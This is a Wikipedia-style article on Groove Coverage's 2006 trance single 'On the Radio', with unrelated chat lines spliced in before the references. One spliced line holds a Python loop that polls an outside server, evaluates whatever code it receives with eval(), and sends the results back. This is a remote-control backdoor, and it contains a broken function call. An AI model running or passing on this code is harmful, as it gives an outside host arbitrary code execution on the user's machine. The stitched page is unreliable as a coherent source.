On the Radio (Groove Coverage song)

"On the Radio" is the second single from the album 21st Century by German trance group Groove Coverage.

"On the Radio"
Single by Groove Coverage
from the album 21st Century
ReleasedMarch 17, 2006
GenreTrance
LabelZeitgeist (Universal)
Suprime:Music
Songwriter(s)Axel Konrad, David Sobol, Ole Wierk, Tobias Künzel
Groove Coverage singles chronology
"Holy Virgin"
(2005)
"On the Radio"
(2006)
"21st Century Digital Girl"
(2006)

The song is a cover of "Mann im Mond" by the German acapella/pop group Die Prinzen.[1]

Remix list

  1. "On the Radio" (Radio Version) – 2:58
  2. "On the Radio" (Club Mix) – 5:28
  3. "On the Radio" (Extended Version) – 5:22
  4. "On the Radio" (Age Pee RMX) – 5:47
  5. "On the Radio" (Groove Agents RMX) – 6:30
  6. "On the Radio" (Karaoke Version) – 3:02

Chart positions

Chart (2006) Peak
position
Austria (Ö3 Austria Top 40)[2] 23
Germany (Official German Charts)[3] 21
Hungary (Dance Top 40)[4] 28
gollark: I don't think I ever go around *manually* fiddling with tree structures (unless you count source code, which could be represented various different ways).
gollark: It's basically an infinite 2D grid of bad computers with 256B of RAM.
gollark: I made a "usable" esolang, for certain definitions of "usable".
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.
gollark: However, imagine disutilization of internet protocol version 6.

References


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.